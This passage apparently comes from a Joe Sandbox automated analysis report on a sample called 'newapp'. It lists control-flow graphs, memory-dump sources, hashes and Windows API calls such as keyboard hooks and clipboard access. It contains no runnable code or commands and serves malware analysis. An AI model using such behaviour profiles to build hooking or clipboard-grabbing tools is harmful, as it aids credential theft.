                                                                                                            • GetCurrentThread.KERNEL32 ref: 069CA363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 069CA3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: b8ffa53fe131f67d2ae8962fbc9ec925c8e76a1eebf1387448f098c32c2da469
                                                                                                            • Instruction ID: 4e288eb091ed35f48f088b703da757b9b5a8d555cdaf7cfbf34c70e5a2c1c06a
                                                                                                            • Opcode Fuzzy Hash: b8ffa53fe131f67d2ae8962fbc9ec925c8e76a1eebf1387448f098c32c2da469
                                                                                                            • Instruction Fuzzy Hash: 175135B09003098FDB54DFAAD948BDEBBF5EF48314F208459E41AA7760DB349984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 601 69ca247-69ca337 GetCurrentProcess 606 69ca339-69ca33f 601->606 607 69ca340-69ca374 GetCurrentThread 601->607 606->607 608 69ca37d-69ca3b1 GetCurrentProcess 607->608 609 69ca376-69ca37c 607->609 611 69ca3ba-69ca3d5 call 69ca478 608->611 612 69ca3b3-69ca3b9 608->612 609->608 615 69ca3db-69ca40a GetCurrentThreadId 611->615 612->611 616 69ca40c-69ca412 615->616 617 69ca413-69ca475 615->617 616->617
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA326
                                                                                                            • GetCurrentThread.KERNEL32 ref: 069CA363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 069CA3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 4f577b4633220932f1d9d60fa70ba0eaac1d4a66f420b827cf38e4511851237e
                                                                                                            • Instruction ID: 145799900968f0c12f178c96c47dcce08793ca2b8e624cadeee333d46e617367
                                                                                                            • Opcode Fuzzy Hash: 4f577b4633220932f1d9d60fa70ba0eaac1d4a66f420b827cf38e4511851237e
                                                                                                            • Instruction Fuzzy Hash: 645154B09003098FDB44CFAADA48BDEBBF1AF48314F20C459D01AA7760DB349985CF66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 624 69d9238-69d925d 627 69d925f-69d9262 624->627 628 69d9268-69d927d 627->628 629 69d9b20-69d9b23 627->629 635 69d927f-69d9285 628->635 636 69d9295-69d92ab 628->636 630 69d9b49-69d9b4b 629->630 631 69d9b25-69d9b44 629->631 633 69d9b4d 630->633 634 69d9b52-69d9b55 630->634 631->630 633->634 634->627 638 69d9b5b-69d9b65 634->638 639 69d9289-69d928b 635->639 640 69d9287 635->640 643 69d92b6-69d92b8 636->643 639->636 640->636 644 69d92ba-69d92c0 643->644 645 69d92d0-69d9341 643->645 646 69d92c4-69d92c6 644->646 647 69d92c2 644->647 656 69d936d-69d9389 645->656 657 69d9343-69d9366 645->657 646->645 647->645 662 69d938b-69d93ae 656->662 663 69d93b5-69d93d0 656->663 657->656 662->663 668 69d93fb-69d9416 663->668 669 69d93d2-69d93f4 663->669 674 69d9418-69d9434 668->674 675 69d943b-69d9449 668->675 669->668 674->675 676 69d9459-69d94d3 675->676 677 69d944b-69d9454 675->677 683 69d94d5-69d94f3 676->683 684 69d9520-69d9535 676->684 677->638 688 69d950f-69d951e 683->688 689 69d94f5-69d9504 683->689 684->629 688->683 688->684 689->688
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 756c7a86e87f71d4cbe01a803d3bbbb22c1e6191472dcb3813e90ddd3770f8a2
                                                                                                            • Instruction ID: d86f0b4a8ef17e8561fe1e96bbc213b6dfd7b96cda990dfd9899707f55534652
                                                                                                            • Opcode Fuzzy Hash: 756c7a86e87f71d4cbe01a803d3bbbb22c1e6191472dcb3813e90ddd3770f8a2
                                                                                                            • Instruction Fuzzy Hash: 1A913E30B0021A9FDB54EF65D9907AFB7F6AF88204F10C569D80DEB784EA709D46CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 692 69dd038-69dd053 693 69dd055-69dd058 692->693 694 69dd05a-69dd09c 693->694 695 69dd0a1-69dd0a4 693->695 694->695 696 69dd0ed-69dd0f0 695->696 697 69dd0a6-69dd0e8 695->697 699 69dd0ff-69dd102 696->699 700 69dd0f2-69dd0f4 696->700 697->696 703 69dd14b-69dd14e 699->703 704 69dd104-69dd113 699->704 701 69dd0fa 700->701 702 69dd521 700->702 701->699 709 69dd524-69dd530 702->709 706 69dd197-69dd19a 703->706 707 69dd150-69dd192 703->707 710 69dd115-69dd11a 704->710 711 69dd122-69dd12e 704->711 713 69dd19c-69dd1a1 706->713 714 69dd1a4-69dd1a7 706->714 707->706 709->704 712 69dd536-69dd823 709->712 710->711 715 69dda55-69dda8e 711->715 716 69dd134-69dd146 711->716 905 69dd829-69dd82f 712->905 906 69dda4a-69dda54 712->906 713->714 720 69dd1a9-69dd1ab 714->720 721 69dd1b6-69dd1b9 714->721 735 69dda90-69dda93 715->735 716->703 722 69dd3df-69dd3e8 720->722 723 69dd1b1 720->723 721->709 725 69dd1bf-69dd1c2 721->725 732 69dd3ea-69dd3ef 722->732 733 69dd3f7-69dd403 722->733 723->721 729 69dd1e5-69dd1e8 725->729 730 69dd1c4-69dd1e0 725->730 737 69dd1ea-69dd22c 729->737 738 69dd231-69dd234 729->738 730->729 732->733 739 69dd409-69dd41d 733->739 740 69dd514-69dd519 733->740 741 69dda95-69ddac1 735->741 742 69ddac6-69ddac9 735->742 737->738 745 69dd27d-69dd280 738->745 746 69dd236-69dd278 738->746 739->702 764 69dd423-69dd435 739->764 740->702 741->742 749 69ddad8-69ddadb 742->749 750 69ddacb 742->750 752 69dd2c9-69dd2cc 745->752 753 69dd282-69dd2c4 745->753 746->745 754 69ddadd-69ddaf9 749->754 755 69ddafe-69ddb00 749->755 952 69ddacb call 69ddbad 750->952 953 69ddacb call 69ddbc0 750->953 766 69dd2ce-69dd2e4 752->766 767 69dd2e9-69dd2ec 752->767 753->752 754->755 760 69ddb07-69ddb0a 755->760 761 69ddb02 755->761 760->735 773 69ddb0c-69ddb1b 760->773 761->760 786 69dd459-69dd45b 764->786 787 69dd437-69dd43d 764->787 766->767 771 69dd2ee-69dd330 767->771 772 69dd335-69dd338 767->772 768 69ddad1-69ddad3 768->749 771->772 779 69dd33a-69dd37c 772->779 780 69dd381-69dd384 772->780 796 69ddb1d-69ddb80 call 69d6690 773->796 797 69ddb82-69ddb97 773->797 779->780 789 69dd3cd-69dd3cf 780->789 790 69dd386-69dd395 780->790 808 69dd465-69dd471 786->808 798 69dd43f 787->798 799 69dd441-69dd44d 787->799 793 69dd3d6-69dd3d9 789->793 794 69dd3d1 789->794 801 69dd3a4-69dd3b0 790->801 802 69dd397-69dd39c 790->802 793->693 793->722 794->793 796->797 815 69ddb98 797->815 806 69dd44f-69dd457 798->806 799->806 801->715 810 69dd3b6-69dd3c8 801->810 802->801 806->808 827 69dd47f 808->827 828 69dd473-69dd47d 808->828 810->789 815->815 832 69dd484-69dd486 827->832 828->832 832->702 835 69dd48c-69dd4a8 call 69d6690 832->835 845 69dd4aa-69dd4af 835->845 846 69dd4b7-69dd4c3 835->846 845->846 846->740 848 69dd4c5-69dd512 846->848 848->702 907 69dd83e-69dd847 905->907 908 69dd831-69dd836 905->908 907->715 909 69dd84d-69dd860 907->909 908->907 911 69dda3a-69dda44 909->911 912 69dd866-69dd86c 909->912 911->905 911->906 913 69dd86e-69dd873 912->913 914 69dd87b-69dd884 912->914 913->914 914->715 915 69dd88a-69dd8ab 914->915 918 69dd8ad-69dd8b2 915->918 919 69dd8ba-69dd8c3 915->919 918->919 919->715 920 69dd8c9-69dd8e6 919->920 920->911 923 69dd8ec-69dd8f2 920->923 923->715 924 69dd8f8-69dd911 923->924 926 69dda2d-69dda34 924->926 927 69dd917-69dd93e 924->927 926->911 926->923 927->715 930 69dd944-69dd94e 927->930 930->715 931 69dd954-69dd96b 930->931 933 69dd96d-69dd978 931->933 934 69dd97a-69dd995 931->934 933->934 934->926 939 69dd99b-69dd9b4 call 69d6690 934->939 943 69dd9b6-69dd9bb 939->943 944 69dd9c3-69dd9cc 939->944 943->944 944->715 945 69dd9d2-69dda26 944->945 945->926 952->768 953->768
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: b3ed24fb4f9f680905325312469888a58f651a9f8e1ef7550d5f8ecb1aad629b
                                                                                                            • Instruction ID: 86f3138215f863ca3d217d518a62da1f09fde3229e097fa78ca42b6743ad9d49
                                                                                                            • Opcode Fuzzy Hash: b3ed24fb4f9f680905325312469888a58f651a9f8e1ef7550d5f8ecb1aad629b
                                                                                                            • Instruction Fuzzy Hash: 39622E30A002169FCB55EF68D580A5DB7B2FF84344B24CA69D409DF769DB71ED4ACB80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 954 69d4c78-69d4c9c 955 69d4c9e-69d4ca1 954->955 956 69d4ca3-69d4cbd 955->956 957 69d4cc2-69d4cc5 955->957 956->957 958 69d4ccb-69d4dc3 957->958 959 69d53a4-69d53a6 957->959 977 69d4dc9-69d4e11 958->977 978 69d4e46-69d4e4d 958->978 961 69d53ad-69d53b0 959->961 962 69d53a8 959->962 961->955 963 69d53b6-69d53c3 961->963 962->961 999 69d4e16 call 69d5530 977->999 1000 69d4e16 call 69d5523 977->1000 979 69d4ed1-69d4eda 978->979 980 69d4e53-69d4ec3 978->980 979->963 997 69d4ece 980->997 998 69d4ec5 980->998 991 69d4e1c-69d4e38 994 69d4e3a 991->994 995 69d4e43 991->995 994->995 995->978 997->979 998->997 999->991 1000->991
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: fa72c5b2549aaf99e00f8f66ac62c947c9a13d143d3a6b18b5f2cc54f0d968c5
                                                                                                            • Instruction ID: 41ea2cead6efcbbca99e6b7d82903f5776ae7489f53468750e34dd83b8f2595c
                                                                                                            • Opcode Fuzzy Hash: fa72c5b2549aaf99e00f8f66ac62c947c9a13d143d3a6b18b5f2cc54f0d968c5
                                                                                                            • Instruction Fuzzy Hash: 57615F30F002189FEB549FA5C8547AEBBF6EF88700F208429E109EB395DF758D459B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1934 69d9228-69d922a 1935 69d922c-69d922e 1934->1935 1936 69d9231 1934->1936 1937 69d9235-69d9236 1935->1937 1938 69d9230 1935->1938 1939 69d9239-69d923c 1936->1939 1940 69d9232 1936->1940 1942 69d923d-69d925d 1937->1942 1943 69d9238 1937->1943 1938->1936 1939->1942 1940->1939 1941 69d9234 1940->1941 1941->1937 1944 69d925f-69d9262 1942->1944 1943->1939 1945 69d9268-69d927d 1944->1945 1946 69d9b20-69d9b23 1944->1946 1952 69d927f-69d9285 1945->1952 1953 69d9295-69d92ab 1945->1953 1947 69d9b49-69d9b4b 1946->1947 1948 69d9b25-69d9b44 1946->1948 1950 69d9b4d 1947->1950 1951 69d9b52-69d9b55 1947->1951 1948->1947 1950->1951 1951->1944 1955 69d9b5b-69d9b65 1951->1955 1956 69d9289-69d928b 1952->1956 1957 69d9287 1952->1957 1960 69d92b6-69d92b8 1953->1960 1956->1953 1957->1953 1961 69d92ba-69d92c0 1960->1961 1962 69d92d0-69d9341 1960->1962 1963 69d92c4-69d92c6 1961->1963 1964 69d92c2 1961->1964 1973 69d936d-69d9389 1962->1973 1974 69d9343-69d9366 1962->1974 1963->1962 1964->1962 1979 69d938b-69d93ae 1973->1979 1980 69d93b5-69d93d0 1973->1980 1974->1973 1979->1980 1985 69d93fb-69d9416 1980->1985 1986 69d93d2-69d93f4 1980->1986 1991 69d9418-69d9434 1985->1991 1992 69d943b-69d9449 1985->1992 1986->1985 1991->1992 1993 69d9459-69d94d3 1992->1993 1994 69d944b-69d9454 1992->1994 2000 69d94d5-69d94f3 1993->2000 2001 69d9520-69d9535 1993->2001 1994->1955 2005 69d950f-69d951e 2000->2005 2006 69d94f5-69d9504 2000->2006 2001->1946 2005->2000 2005->2001 2006->2005
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 8222e90aff2fb97fe56eb962c5b3759feaf5d0725c70266ddf24098fde0844df
                                                                                                            • Instruction ID: e24f545ed352e0c43ca0379204ffce7430d3cbebec7c8a6f81f04a7c8d8d206b
                                                                                                            • Opcode Fuzzy Hash: 8222e90aff2fb97fe56eb962c5b3759feaf5d0725c70266ddf24098fde0844df
                                                                                                            • Instruction Fuzzy Hash: 50513F30B011159FDB94EBA4D9A0B6FB3FAAB88654F108539D51DDB788DA30DC43CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 47f1201072d32e3f6d321f0f1c65f8cc944173f2412f25679b439d34e6fc797e
                                                                                                            • Instruction ID: c9af7144465e7dfe0228edbde88fdde931e7ba01d09a115641dafe6baf5f8446
                                                                                                            • Opcode Fuzzy Hash: 47f1201072d32e3f6d321f0f1c65f8cc944173f2412f25679b439d34e6fc797e
                                                                                                            • Instruction Fuzzy Hash: 0D516A30F102089FDB55DFA5C854BAEBBF6AF88700F20C52AE109EB395DA758D059B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: e4ace13408c19fc2a8860f6c1489bb3e1b8be90df8ca0b75905e29a434e6872b
                                                                                                            • Instruction ID: f1b021386c4b2fe8f17f2ce3173b88f79c489dfb13da84f8fec9a98c80833bc0
                                                                                                            • Opcode Fuzzy Hash: e4ace13408c19fc2a8860f6c1489bb3e1b8be90df8ca0b75905e29a434e6872b
                                                                                                            • Instruction Fuzzy Hash: 2CB16B70B007058FCB44EF69C89065EBBF6EF88320B10892DD41ACBB55DB74E856CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4167175807.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_2a60000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93c79c10442a1ba79e9c823b2030c58a68474d86e811ca0ca019ffbd2ca62288
                                                                                                            • Instruction ID: e25a4236bcfde0791b93a97a710db7dbb28ff0db5bde86b0c7c4ec0563ef4b10
                                                                                                            • Opcode Fuzzy Hash: 93c79c10442a1ba79e9c823b2030c58a68474d86e811ca0ca019ffbd2ca62288
                                                                                                            • Instruction Fuzzy Hash: 3741F271E043999FCB14CF69D844AAEBFF5AF89310F1485ABE448A7251DB389841CBE1
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C686A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 4cd02390d7906650c94a63cf76a90017cf211af59dc0b4129ad04a5dbdaf37e5
                                                                                                            • Instruction ID: 8d5d8e83239d659241cac4e52506ef3a79ca1093e1ec7e705fbe343f71f8170a
                                                                                                            • Opcode Fuzzy Hash: 4cd02390d7906650c94a63cf76a90017cf211af59dc0b4129ad04a5dbdaf37e5
                                                                                                            • Instruction Fuzzy Hash: 9F51CFB1D003499FDB14CFA9C884ADEFFB5BF88310F24852AE419AB210D770A985CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069C686A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 12be059f2b14b7ba990896b5864327b282f696f8b4d324bd64c18be3a5534911
                                                                                                            • Instruction ID: da92f6fc979e22afdbb6ee5dffedded27a75f13b421dafe2df6d8af04d171121
                                                                                                            • Opcode Fuzzy Hash: 12be059f2b14b7ba990896b5864327b282f696f8b4d324bd64c18be3a5534911
                                                                                                            • Instruction Fuzzy Hash: C941BEB1D003499FDB14CF9AC884ADEBBB5FF48310F24852AE819AB210D775A985CF91
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 069CB851
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 77e8eb8377d5863fcf8cfa804edf3e48e53765f16970ffeec3fb785918510a52
                                                                                                            • Instruction ID: 34d54803ec8d41cbcf290b630e792fa2acfe4a0c798e25268cf2031dce42c93f
                                                                                                            • Opcode Fuzzy Hash: 77e8eb8377d5863fcf8cfa804edf3e48e53765f16970ffeec3fb785918510a52
                                                                                                            • Instruction Fuzzy Hash: 304117B4E00309CFDB54CF99C489AAABBF5FB88324F24C459D519AB725D734A841CFA1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 8a872618d03fe58f3793d1eddf8dd06ff931fb6bd54320ccbd2ae0a2a7ffba0e
                                                                                                            • Instruction ID: 78fb7974a217cefeffb6ba104834d2dad825cb69e9bd40bd34098ccbbfd7c024
                                                                                                            • Opcode Fuzzy Hash: 8a872618d03fe58f3793d1eddf8dd06ff931fb6bd54320ccbd2ae0a2a7ffba0e
                                                                                                            • Instruction Fuzzy Hash: 8F3102B0E01248EFDB14CFA9C984BDEBFF5AF48314F248019E409BB290DB755985CBA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 0972b9fea534877604348ecc4bd1b1cde863ebf6355532beb230a0ea2456e06b
                                                                                                            • Instruction ID: 5dfa4755c6f188af2c721434bce9e40a22bedcde611b0fd5416d0f86cbb666f2
                                                                                                            • Opcode Fuzzy Hash: 0972b9fea534877604348ecc4bd1b1cde863ebf6355532beb230a0ea2456e06b
                                                                                                            • Instruction Fuzzy Hash: 2731E0B0E01248DFDB14DF99C984B8EBFF5AB48314F248019E409AB290DB756985CB95
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069CA577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 6ab5ea0eb5f9162974bfbaf736ef33291543a708b38f153e434ae92065e0a59a
                                                                                                            • Instruction ID: 08a97987fae684b6ea9617cf3bccca1541b0c23512e42640a9628d2d3ef86fbe
                                                                                                            • Opcode Fuzzy Hash: 6ab5ea0eb5f9162974bfbaf736ef33291543a708b38f153e434ae92065e0a59a
                                                                                                            • Instruction Fuzzy Hash: 2E21E7B5D01259DFDB10CFA9D984ADEFFF8EB48320F14841AE955A3210C374A944CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069CA577
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e0fe1a04bdb2e4ddac5f810127eef9216fd8b8a41594f71da4377734ec4ae4cd
                                                                                                            • Instruction ID: 449a0f2ed47e1f905d80c894a5ee68a54d7d900a66e53fbd45619addbaddef1b
                                                                                                            • Opcode Fuzzy Hash: e0fe1a04bdb2e4ddac5f810127eef9216fd8b8a41594f71da4377734ec4ae4cd
                                                                                                            • Instruction Fuzzy Hash: 7921E3B59002489FDB10CF9AD984ADEFBF8EB48320F14801AE958A3210C374A944CFA5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CDF23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: ffde027ebdc1962105254ad0083a13f2eb49ccf92ca57a39be1b0acaa84ad1de
                                                                                                            • Instruction ID: 26955bac0091da3db954ee05df52080f768edffcf3b18e5d51cc2806eb6616f6
                                                                                                            • Opcode Fuzzy Hash: ffde027ebdc1962105254ad0083a13f2eb49ccf92ca57a39be1b0acaa84ad1de
                                                                                                            • Instruction Fuzzy Hash: CA2102B19002499FDB54CF9AC844BEEFBF5EF88324F10842AE459A7250C774A945CFA5
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 02A6EFE7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4167175807.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_2a60000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 5a91ca7c4152bafe75c6e78c045387424cd2eb2f5297e69a4cf8f0e998f4960e
                                                                                                            • Instruction ID: 8a83db22f3664de49a3509406302481cf50debd97be997d6366f83db440488a1
                                                                                                            • Opcode Fuzzy Hash: 5a91ca7c4152bafe75c6e78c045387424cd2eb2f5297e69a4cf8f0e998f4960e
                                                                                                            • Instruction Fuzzy Hash: 341133B1C0066A9FCB10DF9AC548BDEFBF4EB48324F10816AE418A7240D778A940CFE5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069CDF23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: eb3dea4fc46f44ffeaae6723e59d89bcdf2f41837bff3a9b784e565d84b8b3b5
                                                                                                            • Instruction ID: f44ecab54724d46c6fb852b08c17507ec87970dd6c8c32863b2cb96304e6d165
                                                                                                            • Opcode Fuzzy Hash: eb3dea4fc46f44ffeaae6723e59d89bcdf2f41837bff3a9b784e565d84b8b3b5
                                                                                                            • Instruction Fuzzy Hash: 6A2113B1D002498FCB14CF9AC844BEEFBF5BF88320F10842AE459A7250C774A944CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 069C5716
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 85efc6a2fdcb1480edc0e6c7bf652c6dadbfcf6eaea5dc1b69a8eff88c89d65f
                                                                                                            • Instruction ID: 46bec151b9a60b0afb9334e9f0da1c0292e6fb80758a72580802f2859471e824
                                                                                                            • Opcode Fuzzy Hash: 85efc6a2fdcb1480edc0e6c7bf652c6dadbfcf6eaea5dc1b69a8eff88c89d65f
                                                                                                            • Instruction Fuzzy Hash: FD1126B5C01649DECB10CF9AC844BDEFBF8EB49320F11852AD459A7610C375A586CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 069C5716
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
